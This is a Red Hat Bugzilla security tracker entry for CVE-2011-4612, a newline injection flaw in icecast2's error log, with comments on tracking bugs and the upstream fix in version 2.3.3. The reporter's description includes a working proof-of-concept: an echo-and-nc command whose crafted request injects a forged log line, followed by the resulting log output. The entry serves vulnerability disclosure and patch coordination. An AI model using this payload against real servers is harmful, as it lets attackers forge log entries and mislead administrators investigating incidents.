Bug 768157 - (CVE-2011-4612) CVE-2011-4612 icecast2: Newline injection in error.log
CVE-2011-4612 icecast2: Newline injection in error.log
Product: Security Response
Classification: Other
Component: vulnerability (Show other bugs)
All Linux
medium Severity medium
: ---
: ---
Assigned To: Red Hat Product Security
: Security
Depends On: 768175 768176
  Show dependency treegraph
Reported: 2011-12-15 16:53 EST by Kurt Seifried
Modified: 2014-02-11 00:45 EST (History)
3 users (show)

See Also:
Fixed In Version: icecast 2.3.3
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Last Closed: 2012-12-20 12:48:59 EST
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---

Attachments (Terms of Use)

  None (edit)
Description Kurt Seifried 2011-12-15 16:53:42 EST
A security bug was reported by Moritz Naumann against icecast in
Ubuntu. You are being emailed as the upstream contact. Please keep
oss-security@lists.openwall.com[1] CC'd for any updates on this issue.

This issue should be considered public and has not yet been assigned a

Details from the public bug follow:

From the reporter:
"Newline injection in error.log

Running this command against an icecast2 running on

echo -ne "GET /non-existent"'"'"%20No%20such%20file%20or%20directory%0d%
0a["`date "+%Y-%m-%d%%20%%20%H:%M:%S"`"]%20WARN%
20"'"'"/usr/share/icecast2/web/ HTTP/1.0\n\n" | nc -vv 8000
> /dev/null
...causes the following to be written to /var/log/icecast2/error.log:
[2011-11-25 15:37:31] INFO fserve/fserve_client_create checking for
file /non-existent" No such file or directory
[1970-01-01 00:00:00] PHUN I'm feeling phunny

Thanks in advance for your cooperation in coordinating a fix for this

[1] oss-security@lists.openwall.com is a public mailing list for
    people to collaborate on security vulnerabilities and coordinate
    security updates.

-- Jamie Strandboge | http://www.canonical.com
Comment 1 Vincent Danen 2011-12-15 17:44:51 EST
Created icecast tracking bugs for this issue

Affects: fedora-all [bug 768175]
Affects: epel-5 [bug 768176]
Comment 2 Vincent Danen 2012-06-15 14:24:56 EDT
This is corrected in upstream 2.3.3 version (released June 11th):

Comment 3 Murray McAllister 2014-02-11 00:45:08 EST
https://bugzilla.novell.com/show_bug.cgi?id=862096 notes the icecast-2.3.2-CVE-2011-4612.diff introdces a use-after-free flaw and should be removed (since the issue was fixed upstream). I could not find this patch in Fedora or EPEL 6.

EPEL 6 is missing from the trackers here ... but it seems to have the fixed version now, so I will not file one.

Note You need to log in before you can comment on or make changes to this bug.